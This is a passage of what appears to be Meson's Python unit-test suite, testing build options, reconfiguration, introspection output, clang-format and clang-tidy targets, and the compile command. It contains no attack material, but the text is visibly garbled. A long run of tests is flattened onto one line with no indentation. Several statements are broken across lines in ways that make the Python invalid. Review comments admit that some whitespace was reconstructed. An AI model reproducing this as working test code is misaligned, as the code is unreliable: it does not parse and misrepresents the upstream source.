                                    stderr=subprocess.DEVNULL)
                self.assertIn(b'Must specify at least one directory name', pc.stdout)
                with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
                    subprocess.run(self.setup_command,
                                   check=True,
                                   cwd=builddir,
                                   stdout=subprocess.DEVNULL,
                                   stderr=subprocess.DEVNULL)

    def get_opts_as_dict(self):
        # Helper: flatten introspected build options into {name: value}.
        result = {}
        for i
 in self.introspect('--buildoptions'):
            result[i['name']] = i['value']
        return result

    def test_buildtype_setting(self):
        # Exercises the coupling between buildtype and the debug/optimization
        # options, both via `meson configure` and via command-line args.
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        self.init(testdir)
        opts = self.get_opts_as_dict()
        self.assertEqual(opts['buildtype'], 'debug')
        self.assertEqual(opts['debug'], True)
        self.setconf('-Ddebug=false')
        opts = self.get_opts_as_dict()
        self.assertEqual(opts['debug'], False)
        self.assertEqual(opts['buildtype'], 'plain')
        self.assertEqual(opts['optimization'], '0')

        # Setting optimizations to 3 should cause buildtype
        # to go to release mode.
        self.setconf('-Doptimization=3')
        opts = self.get_opts_as_dict()
        self.assertEqual(opts['buildtype'], 'release')
        self.assertEqual(opts['debug'], False)
        self.assertEqual(opts['optimization'], '3')

        # Going to debug build type should reset debugging
        # and optimization
        self.setconf('-Dbuildtype=debug')
        opts = self.get_opts_as_dict()
        self.assertEqual(opts['buildtype'], 'debug')
        self.assertEqual(opts['debug'], True)
        self.assertEqual(opts['optimization'], '0')

        # Command-line parsing of buildtype settings should be the same as
        # setting with `meson configure`.
        #
        # Setting buildtype should set optimization/debug
        self.new_builddir()
        self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
        opts = self.get_opts_as_dict()
        self.assertEqual(opts['debug'], True)
        self.assertEqual(opts['optimization'], '2')
        self.assertEqual(opts['buildtype'], 'debugoptimized')
        # Setting optimization/debug should set buildtype
        self.new_builddir()
        self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true'])
        opts = self.get_opts_as_dict()
        self.assertEqual(opts['debug'], True)
        self.assertEqual(opts['optimization'], '2')
        self.assertEqual(opts['buildtype'], 'debugoptimized')
        # Setting both buildtype and debug on the command-line should work, and
        # should warn not to do that.
        # Also test that --debug is parsed as -Ddebug=true
        self.new_builddir()
        out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug'])
        self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant')
        opts = self.get_opts_as_dict()
        self.assertEqual(opts['debug'], True)
        self.assertEqual(opts['optimization'], '2')
        self.assertEqual(opts['buildtype'], 'debugoptimized')

    @skipIfNoPkgconfig
    @unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
    def test_native_dep_pkgconfig(self):
        # Cross file points pkgconfig at a wrapper script; check native vs
        # cross dependency lookup both work.
        testdir = os.path.join(self.unit_test_dir, '46 native dep pkgconfig var')
        with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
            # NOTE(review): exact internal whitespace of this cross-file text
            # reconstructed from a mangled source — verify against upstream.
            crossfile.write(textwrap.dedent(
                '''[binaries]
                pkgconfig = '{0}'

                [properties]

                [host_machine]
                system = 'linux'
                cpu_family = 'arm'
                cpu = 'armv7'
                endian = 'little'
                '''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
            crossfile.flush()
            self.meson_cross_file = crossfile.name

        env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir, 'native_pkgconfig')}
        self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
        self.wipe()
        self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)

    @skipIfNoPkgconfig
    @unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
    def test_pkg_config_libdir(self):
        # Same scenario but using the pkg_config_libdir cross-file property
        # instead of a wrapper binary.
        testdir = os.path.join(self.unit_test_dir, '46 native dep pkgconfig var')
        with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
            crossfile.write(textwrap.dedent(
                '''[binaries]
                pkgconfig = 'pkg-config'

                [properties]
                pkg_config_libdir = ['{0}']

                [host_machine]
                system = 'linux'
                cpu_family = 'arm'
                cpu = 'armv7'
                endian = 'little'
                '''.format(os.path.join(testdir, 'cross_pkgconfig'))))
            crossfile.flush()
            self.meson_cross_file = crossfile.name

        env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir, 'native_pkgconfig')}
        self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
        self.wipe()
        self.init(testdir, extra_args=['-Dstart_native=true'],
 override_envvars=env)

    def __reconfigure(self, change_minor=False):
        # Set an older version to force a reconfigure from scratch
        filename = os.path.join(self.privatedir, 'coredata.dat')
        with open(filename, 'rb') as f:
            obj = pickle.load(f)
        if change_minor:
            # Bump only the patch component so the version still "matches".
            v = mesonbuild.coredata.version.split('.')
            obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
        else:
            obj.version = '0.47.0'
        with open(filename, 'wb') as f:
            pickle.dump(obj, f)

    def test_reconfigure(self):
        testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
        self.init(testdir, extra_args=['-Dopt1=val1'])
        self.setconf('-Dopt2=val2')
        self.__reconfigure()

        out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
        self.assertRegex(out, 'Regenerating configuration from scratch')
        self.assertRegex(out, 'opt1 val1')
        self.assertRegex(out, 'opt2 val2')
        self.assertRegex(out, 'opt3 val3')
        self.assertRegex(out, 'opt4 default4')
        self.build()
        self.run_tests()

        # Create a file in builddir and verify wipe command removes it
        filename = os.path.join(self.builddir, 'something')
        open(filename, 'w').close()
        self.assertTrue(os.path.exists(filename))
        out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
        self.assertFalse(os.path.exists(filename))
        self.assertRegex(out, 'opt1 val1')
        self.assertRegex(out, 'opt2 val2')
        self.assertRegex(out, 'opt3 val3')
        self.assertRegex(out, 'opt4 val4')
        self.build()
        self.run_tests()

    def test_wipe_from_builddir(self):
        testdir = os.path.join(self.common_test_dir, '158 custom target subdir depend files')
        self.init(testdir)
        self.__reconfigure()
        with Path(self.builddir):
            self.init(testdir, extra_args=['--wipe'])

    def test_minor_version_does_not_reconfigure_wipe(self):
        # A patch-level version bump must NOT trigger a from-scratch regen.
        testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
        self.init(testdir, extra_args=['-Dopt1=val1'])
        self.setconf('-Dopt2=val2')
        self.__reconfigure(change_minor=True)

        out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
        self.assertNotRegex(out, 'Regenerating configuration from scratch')
        self.assertRegex(out, 'opt1 val1')
        self.assertRegex(out, 'opt2 val2')
        self.assertRegex(out, 'opt3 val3')
        self.assertRegex(out, 'opt4 default4')
        self.build()
        self.run_tests()

    def test_target_construct_id_from_path(self):
        # This id is stable but not guessable.
        # The test is supposed to prevent unintentional
        # changes of target ID generation.
        target_id = Target.construct_id_from_path('some/obscure/subdir', 'target-id', '@suffix')
        self.assertEqual('5e002d3@@target-id@suffix', target_id)
        target_id = Target.construct_id_from_path('subproject/foo/subdir/bar', 'target2-id', '@other')
        self.assertEqual('81d46d1@@target2-id@other', target_id)

    def test_introspect_projectinfo_without_configured_build(self):
        # --projectinfo straight from a meson.build (no configured builddir).
        testfile = os.path.join(self.common_test_dir, '34 run program', 'meson.build')
        res = self.introspect_directory(testfile, '--projectinfo')
        self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
        self.assertEqual(res['version'], 'undefined')
        self.assertEqual(res['descriptive_name'], 'run command')
        self.assertEqual(res['subprojects'], [])

        testfile = os.path.join(self.common_test_dir, '41 options', 'meson.build')
        res = self.introspect_directory(testfile, '--projectinfo')
        self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
        self.assertEqual(res['version'], 'undefined')
        self.assertEqual(res['descriptive_name'], 'options')
        self.assertEqual(res['subprojects'], [])

        testfile = os.path.join(self.common_test_dir, '44 subproject options', 'meson.build')
        res = self.introspect_directory(testfile, '--projectinfo')
        self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
        self.assertEqual(res['version'], 'undefined')
        self.assertEqual(res['descriptive_name'], 'suboptions')
        self.assertEqual(len(res['subprojects']), 1)
        subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
        self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt',
                                                'subprojects/subproject/meson.build']))
        self.assertEqual(res['subprojects'][0]['name'], 'subproject')
        self.assertEqual(res['subprojects'][0]['version'], 'undefined')
        self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')

    def test_introspect_projectinfo_subprojects(self):
        testdir = os.path.join(self.common_test_dir, '99 subproject subdir')
        self.init(testdir)
        res = self.introspect('--projectinfo')
        expected = {
            'descriptive_name': 'proj',
            'version': 'undefined',
            'subproject_dir': 'subprojects',
            'subprojects': [
                {
                    'descriptive_name': 'sub',
                    'name': 'sub',
                    'version': '1.0'
                },
                {
                    'descriptive_name': 'sub_implicit',
                    'name': 'sub_implicit',
                    'version': '1.0',
                },
                {
                    'descriptive_name': 'sub-novar',
                    'name': 'sub_novar',
                    'version': '1.0',
                },
                {
                    'descriptive_name': 'subsub',
                    'name': 'subsub',
                    'version': 'undefined'
                },
                {
                    'descriptive_name': 'subsubsub',
                    'name': 'subsubsub',
                    'version': 'undefined'
                },
            ]
        }
        # Sort so the comparison is order-independent.
        res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
        self.assertDictEqual(expected, res)

    def test_introspection_target_subproject(self):
        testdir = os.path.join(self.common_test_dir, '43 subproject')
        self.init(testdir)
        res = self.introspect('--targets')

        expected = {
            'sublib': 'sublib',
            'simpletest': 'sublib',
            'user': None
        }

        for entry in res:
            name = entry['name']
            self.assertEqual(entry['subproject'], expected[name])

    def test_introspect_projectinfo_subproject_dir(self):
        testdir = os.path.join(self.common_test_dir, '76 custom subproject dir')
        self.init(testdir)
        res = self.introspect('--projectinfo')
        self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')

    def test_introspect_projectinfo_subproject_dir_from_source(self):
        testfile = os.path.join(self.common_test_dir, '76 custom subproject dir', 'meson.build')
        res = self.introspect_directory(testfile, '--projectinfo')
        self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')

    @skipIfNoExecutable('clang-format')
    def test_clang_format(self):
        if self.backend is not Backend.ninja:
            raise
 unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
        testdir = os.path.join(self.unit_test_dir, '54 clang-format')
        testfile = os.path.join(testdir, 'prog.c')
        badfile = os.path.join(testdir, 'prog_orig_c')
        goodfile = os.path.join(testdir, 'prog_expected_c')
        testheader = os.path.join(testdir, 'header.h')
        badheader = os.path.join(testdir, 'header_orig_h')
        goodheader = os.path.join(testdir, 'header_expected_h')
        try:
            # Copy the badly-formatted inputs into place, run the
            # clang-format target, and check they get reformatted.
            shutil.copyfile(badfile, testfile)
            shutil.copyfile(badheader, testheader)
            self.init(testdir)
            self.assertNotEqual(Path(testfile).read_text(), Path(goodfile).read_text())
            self.assertNotEqual(Path(testheader).read_text(), Path(goodheader).read_text())
            self.run_target('clang-format')
            self.assertEqual(Path(testheader).read_text(), Path(goodheader).read_text())
        finally:
            # The copies live in the source tree; always clean them up.
            if os.path.exists(testfile):
                os.unlink(testfile)
            if os.path.exists(testheader):
                os.unlink(testheader)

    @skipIfNoExecutable('clang-tidy')
    def test_clang_tidy(self):
        if self.backend is not Backend.ninja:
            raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
        if shutil.which('c++') is None:
            raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
        if is_osx():
            raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
        testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
        dummydir = os.path.join(testdir, 'dummydir.h')
        self.init(testdir, override_envvars={'CXX': 'c++'})
        out = self.run_target('clang-tidy')
        self.assertIn('cttest.cpp:4:20', out)
        self.assertNotIn(dummydir, out)

    def test_identity_cross(self):
        testdir = os.path.join(self.unit_test_dir, '71 cross')

        # Do a build to generate a cross file where the host is this target
        self.init(testdir, extra_args=['-Dgenerate=true'])
        self.meson_cross_file = os.path.join(self.builddir, "crossfile")
        self.assertTrue(os.path.exists(self.meson_cross_file))

        # Now verify that this is detected as cross
        self.new_builddir()
        self.init(testdir)

    def test_introspect_buildoptions_without_configured_build(self):
        # Introspecting options from source must match introspecting them
        # from a configured build directory.
        testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
        testfile = os.path.join(testdir, 'meson.build')
        res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
        self.init(testdir, default_args=False)
        res_wb = self.introspect('--buildoptions')
        self.maxDiff = None
        # XXX: These now generate in a different order, is that okay?
        self.assertListEqual(sorted(res_nb, key=lambda x: x['name']), sorted(res_wb, key=lambda x: x['name']))

    def test_meson_configure_from_source_does_not_crash(self):
        testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
        self._run(self.mconf_command + [testdir])

    def test_introspect_buildoptions_cross_only(self):
        testdir = os.path.join(self.unit_test_dir, '84 cross only introspect')
        testfile = os.path.join(testdir, 'meson.build')
        res = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
        optnames = [o['name'] for o in res]
        self.assertIn('c_args', optnames)
        self.assertNotIn('build.c_args', optnames)

    def test_introspect_json_dump(self):
        testdir = os.path.join(self.unit_test_dir, '57 introspection')
        self.init(testdir)
        infodir = os.path.join(self.builddir, 'meson-info')
        self.assertPathExists(infodir)

        def assertKeyTypes(key_type_list, obj, strict: bool = True):
            # Check every (key, type) pair in key_type_list against obj; a
            # None in the type tuple marks the key as optional/nullable.
            for i in key_type_list:
                if isinstance(i[1], (list, tuple)) and None in i[1]:
                    i = (i[0], tuple([x for x in i[1] if x is not None]))
                    if i[0] not in obj or obj[i[0]] is None:
                        continue
                self.assertIn(i[0], obj)
                self.assertIsInstance(obj[i[0]], i[1])
            if strict:
                for k in obj.keys():
                    found = False
                    for i in key_type_list:
                        if k == i[0]:
                            found = True
                            break
                    self.assertTrue(found, 'Key "{}" not in expected list'.format(k))

        root_keylist = [
            ('benchmarks', list),
            ('buildoptions', list),
            ('buildsystem_files', list),
            ('dependencies', list),
            ('installed', dict),
            ('projectinfo', dict),
            ('targets', list),
            ('tests', list),
        ]

        test_keylist
 = [
            ('cmd', list),
            ('env', dict),
            ('name', str),
            ('timeout', int),
            ('suite', list),
            ('is_parallel', bool),
            ('protocol', str),
            ('depends', list),
            ('workdir', (str, None)),
            ('priority', int),
        ]

        buildoptions_keylist = [
            ('name', str),
            ('section', str),
            ('type', str),
            ('description', str),
            ('machine', str),
            ('choices', (list, None)),
            ('value', (str, int, bool, list)),
        ]

        buildoptions_typelist = [
            ('combo', str, [('choices', list)]),
            ('string', str, []),
            ('boolean', bool, []),
            ('integer', int, []),
            ('array', list, []),
        ]

        buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
        buildoptions_machines = ['any', 'build', 'host']

        dependencies_typelist = [
            ('name', str),
            ('version', str),
            ('compile_args', list),
            ('link_args', list),
        ]

        targets_typelist = [
            ('name', str),
            ('id', str),
            ('type', str),
            ('defined_in', str),
            ('filename', list),
            ('build_by_default', bool),
            ('target_sources', list),
            ('extra_files', list),
            ('subproject', (str, None)),
            ('install_filename', (list, None)),
            ('installed', bool),
        ]

        targets_sources_typelist = [
            ('language', str),
            ('compiler', list),
            ('parameters', list),
            ('sources', list),
            ('generated_sources', list),
        ]

        # First load all files
        res = {}
        for i in root_keylist:
            curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
            self.assertPathExists(curr)
            with open(curr, 'r') as fp:
                res[i[0]] = json.load(fp)

        assertKeyTypes(root_keylist, res)

        # Match target ids to input and output files for ease of reference
        src_to_id = {}
        out_to_id = {}
        for i in res['targets']:
            # NOTE(review): json.dump writes to sys.stdout and returns None,
            # so this print emits the target JSON followed by "None" — looks
            # like leftover debug output; consider removing.
            print(json.dump(i, sys.stdout))
            out_to_id.update({os.path.relpath(out, self.builddir): i['id']
                              for out in i['filename']})
            for group in i['target_sources']:
                src_to_id.update({os.path.relpath(src, testdir): i['id']
                                  for src in group['sources']})

        # Check Tests and benchmarks
        tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
        deps_to_find = {'test case 1': [src_to_id['t1.cpp']],
                        'test case 2': [src_to_id['t2.cpp'], src_to_id['t3.cpp']],
                        'benchmark 1':
 [out_to_id['file2'], src_to_id['t3.cpp']]}
        for i in res['benchmarks'] + res['tests']:
            assertKeyTypes(test_keylist, i)
            if i['name'] in tests_to_find:
                tests_to_find.remove(i['name'])
            self.assertEqual(sorted(i['depends']),
                             sorted(deps_to_find[i['name']]))
        self.assertListEqual(tests_to_find, [])

        # Check buildoptions
        buildopts_to_find = {'cpp_std': 'c++11'}
        for i in res['buildoptions']:
            assertKeyTypes(buildoptions_keylist, i)
            valid_type = False
            for j in buildoptions_typelist:
                if i['type'] == j[0]:
                    self.assertIsInstance(i['value'], j[1])
                    assertKeyTypes(j[2], i, strict=False)
                    valid_type = True
                    break
            self.assertIn(i['section'], buildoptions_sections)
            self.assertIn(i['machine'], buildoptions_machines)
            self.assertTrue(valid_type)
            if i['name'] in buildopts_to_find:
                self.assertEqual(i['value'], buildopts_to_find[i['name']])
                buildopts_to_find.pop(i['name'], None)
        self.assertDictEqual(buildopts_to_find, {})

        # Check buildsystem_files
        bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
        bs_files = [os.path.join(testdir, x) for x in bs_files]
        self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))

        # Check dependencies
        dependencies_to_find = ['threads']
        for i in res['dependencies']:
            assertKeyTypes(dependencies_typelist, i)
            if i['name'] in dependencies_to_find:
                dependencies_to_find.remove(i['name'])
        self.assertListEqual(dependencies_to_find, [])

        # Check projectinfo
        self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})

        # Check targets
        targets_to_find = {
            'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
            'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
            'test1': ('executable', True, True, 'meson.build'),
            'test2': ('executable', True, False, 'meson.build'),
            'test3': ('executable', True, False, 'meson.build'),
        }
        for i in res['targets']:
            assertKeyTypes(targets_typelist, i)
            if i['name'] in targets_to_find:
                tgt = targets_to_find[i['name']]
                self.assertEqual(i['type'], tgt[0])
                self.assertEqual(i['build_by_default'], tgt[1])
                self.assertEqual(i['installed'], tgt[2])
                self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
                targets_to_find.pop(i['name'], None)
            for j in i['target_sources']:
                assertKeyTypes(targets_sources_typelist, j)
        self.assertDictEqual(targets_to_find, {})

    def test_introspect_file_dump_equals_all(self):
        # `meson introspect --all` must match the per-file intro-*.json dumps.
        testdir = os.path.join(self.unit_test_dir, '57 introspection')
        self.init(testdir)
        res_all = self.introspect('--all')
        res_file = {}

        root_keylist = [
            'benchmarks',
            'buildoptions',
            'buildsystem_files',
            'dependencies',
            'installed',
            'projectinfo',
            'targets',
            'tests',
        ]

        infodir = os.path.join(self.builddir, 'meson-info')
        self.assertPathExists(infodir)
        for i in root_keylist:
            curr = os.path.join(infodir, 'intro-{}.json'.format(i))
            self.assertPathExists(curr)
            with open(curr, 'r') as fp:
                res_file[i] = json.load(fp)

        self.assertEqual(res_all, res_file)

    def test_introspect_meson_info(self):
        testdir = os.path.join(self.unit_test_dir, '57 introspection')
        introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
        self.init(testdir)
        self.assertPathExists(introfile)
        with open(introfile, 'r') as fp:
            res1 = json.load(fp)

        for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
            self.assertIn(i, res1)

        self.assertEqual(res1['error'], False)
        self.assertEqual(res1['build_files_updated'], True)

    def test_introspect_config_update(self):
        # Change options via setconf and verify intro-buildoptions.json is
        # rewritten to reflect the new values.
        testdir = os.path.join(self.unit_test_dir, '57 introspection')
        introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
        self.init(testdir)
        self.assertPathExists(introfile)
        with open(introfile, 'r') as fp:
            res1 = json.load(fp)

        # Patch the in-memory copy to the values we are about to configure.
        for i in res1:
            if i['name'] == 'cpp_std':
                i['value'] = 'c++14'
            if i['name'] == 'build.cpp_std':
                i['value'] = 'c++14'
            if i['name'] == 'buildtype':
                i['value'] = 'release'
            if
i['name'] == 'optimization': i['value'] = '3' if i['name'] == 'debug': i['value'] = False self.setconf('-Dcpp_std=c++14') self.setconf('-Dbuildtype=release') with open(introfile, 'r') as fp: res2 = json.load(fp) self.assertListEqual(res1, res2) def test_introspect_targets_from_source(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') testfile = os.path.join(testdir, 'meson.build') introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json') self.init(testdir) self.assertPathExists(introfile) with open(introfile, 'r') as fp: res_wb = json.load(fp) res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args) # Account for differences in output res_wb = [i for i in res_wb if i['type'] != 'custom'] for i in res_wb: i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']] if 'install_filename' in i: del i['install_filename'] sources = [] for j in i['target_sources']: sources += j['sources'] i['target_sources'] = [{ 'language': 'unknown', 'compiler': [], 'parameters': [], 'sources': sources, 'generated_sources': [] }] self.maxDiff = None self.assertListEqual(res_nb, res_wb) def test_introspect_ast_source(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') testfile = os.path.join(testdir, 'meson.build') res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args) node_counter = {} def accept_node(json_node): self.assertIsInstance(json_node, dict) for i in ['lineno', 'colno', 'end_lineno', 'end_colno']: self.assertIn(i, json_node) self.assertIsInstance(json_node[i], int) self.assertIn('node', json_node) n = json_node['node'] self.assertIsInstance(n, str) self.assertIn(n, nodes) if n not in node_counter: node_counter[n] = 0 node_counter[n] = node_counter[n] + 1 for nodeDesc in nodes[n]: key = nodeDesc[0] func = nodeDesc[1] self.assertIn(key, json_node) if func is None: tp = nodeDesc[2] self.assertIsInstance(json_node[key], tp) continue func(json_node[key]) def 
accept_node_list(node_list): self.assertIsInstance(node_list, list) for i in node_list: accept_node(i) def accept_kwargs(kwargs): self.assertIsInstance(kwargs, list) for i in kwargs: self.assertIn('key', i) self.assertIn('val', i) accept_node(i['key']) accept_node(i['val']) nodes = { 'BooleanNode': [('value', None, bool)], 'IdNode': [('value', None, str)], 'NumberNode': [('value', None, int)], 'StringNode': [('value', None, str)], 'ContinueNode': [], 'BreakNode': [], 'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)], 'ArrayNode': [('args', accept_node)], 'DictNode': [('args', accept_node)], 'EmptyNode': [], 'OrNode': [('left', accept_node), ('right', accept_node)], 'AndNode': [('left', accept_node), ('right', accept_node)], 'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)], 'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)], 'NotNode': [('right', accept_node)], 'CodeBlockNode': [('lines', accept_node_list)], 'IndexNode': [('object', accept_node), ('index', accept_node)], 'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)], 'FunctionNode': [('args', accept_node), ('name', None, str)], 'AssignmentNode': [('value', accept_node), ('var_name', None, str)], 'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)], 'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)], 'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)], 'IfNode': [('condition', accept_node), ('block', accept_node)], 'UMinusNode': [('right', accept_node)], 'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)], } accept_node(res_nb) for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]: self.assertIn(n, node_counter) self.assertEqual(node_counter[n], c) def test_introspect_dependencies_from_source(self): testdir = os.path.join(self.unit_test_dir, '57 
introspection') testfile = os.path.join(testdir, 'meson.build') res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args) expected = [ { 'name': 'threads', 'required': True, 'version': [], 'has_fallback': False, 'conditional': False }, { 'name': 'zlib', 'required': False, 'version': [], 'has_fallback': False, 'conditional': False }, { 'name': 'bugDep1', 'required': True, 'version': [], 'has_fallback': False, 'conditional': False }, { 'name': 'somethingthatdoesnotexist', 'required': True, 'version': ['>=1.2.3'], 'has_fallback': False, 'conditional': True }, { 'name': 'look_i_have_a_fallback', 'required': True, 'version': ['>=1.0.0', '<=99.9.9'], 'has_fallback': True, 'conditional': True } ] self.maxDiff = None self.assertListEqual(res_nb, expected) def test_unstable_coredata(self): testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) # just test that the command does not fail (e.g. because it throws an exception) self._run([*self.meson_command, 'unstable-coredata', self.builddir]) @skip_if_no_cmake def test_cmake_prefix_path(self): testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path') self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')]) @skip_if_no_cmake def test_cmake_parser(self): testdir = os.path.join(self.unit_test_dir, '65 cmake parser') self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')]) def test_alias_target(self): if self.backend is Backend.vs: # FIXME: This unit test is broken with vs backend, needs investigation raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name)) testdir = os.path.join(self.unit_test_dir, '66 alias target') self.init(testdir) self.build() self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix)) self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt')) self.run_target('build-all') 
        self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
        self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))

    def test_configure(self):
        '''`meson configure <builddir>` must run cleanly on a configured tree.'''
        testdir = os.path.join(self.common_test_dir, '2 cpp')
        self.init(testdir)
        self._run(self.mconf_command + [self.builddir])

    def test_summary(self):
        '''The configure-time summary() output must match the expected block.'''
        testdir = os.path.join(self.unit_test_dir, '73 summary')
        out = self.init(testdir)
        # NOTE(review): the exact internal whitespace of this dedent literal was
        # reconstructed from a whitespace-corrupted source; confirm the
        # indentation against upstream run_unittests.py before relying on it.
        expected = textwrap.dedent(r'''
            Some Subproject 2.0

                string: bar
                integer: 1
                boolean: True

            My Project 1.0

              Configuration
                Some boolean: False
                Another boolean: True
                Some string: Hello World
                A list: string
                        1
                        True
                empty list:
                A number: 1
                yes: YES
                no: NO
                coma list: a, b, c

              Plugins
                long coma list: alpha, alphacolor, apetag, audiofx, audioparsers, auparse,
                                autodetect, avi

              Subprojects
                sub: YES
                sub2: NO Problem encountered: This subproject failed
            ''')
        expected_lines = expected.split('\n')[1:]
        out_start = out.find(expected_lines[0])
        out_lines = out[out_start:].split('\n')[:len(expected_lines)]
        if sys.version_info < (3, 7, 0):
            # Dictionary order is not stable in Python <3.7, so sort the lines
            # while comparing
            self.assertEqual(sorted(expected_lines), sorted(out_lines))
        else:
            self.assertEqual(expected_lines, out_lines)

    def test_meson_compile(self):
        """Test the meson compile command."""

        # Platform-dependent artifact names for the assertions below.
        def get_exe_name(basename: str) -> str:
            if is_windows():
                return '{}.exe'.format(basename)
            else:
                return basename

        def get_shared_lib_name(basename: str) -> str:
            if mesonbuild.environment.detect_msys2_arch():
                return 'lib{}.dll'.format(basename)
            elif is_windows():
                return '{}.dll'.format(basename)
            elif is_cygwin():
                return 'cyg{}.dll'.format(basename)
            elif is_osx():
                return 'lib{}.dylib'.format(basename)
            else:
                return 'lib{}.so'.format(basename)

        def get_static_lib_name(basename: str) -> str:
            return 'lib{}.a'.format(basename)

        # Base case (no targets or additional arguments)
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        self.init(testdir)
        self._run([*self.meson_command, 'compile', '-C', self.builddir])
        self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog')))

        # `--clean`
        self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
        self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))

        # Target specified in a project with unique names
        testdir = os.path.join(self.common_test_dir, '6 linkshared')
        self.init(testdir, extra_args=['--wipe'])
        # Multiple targets and target type specified
        self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library'])
        # Check that we have a shared lib, but not an executable, i.e. check that target actually worked
        self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib')))
        self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog')))
        self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib')))
        self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog')))

        # Target specified in a project with non unique names
        testdir = os.path.join(self.common_test_dir, '186 same target name')
        self.init(testdir, extra_args=['--wipe'])
        self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo'])
        self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo')))
        self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo'])
        self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo')))

        # run_target
        testdir = os.path.join(self.common_test_dir, '52 run target')
        self.init(testdir, extra_args=['--wipe'])
        out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi'])
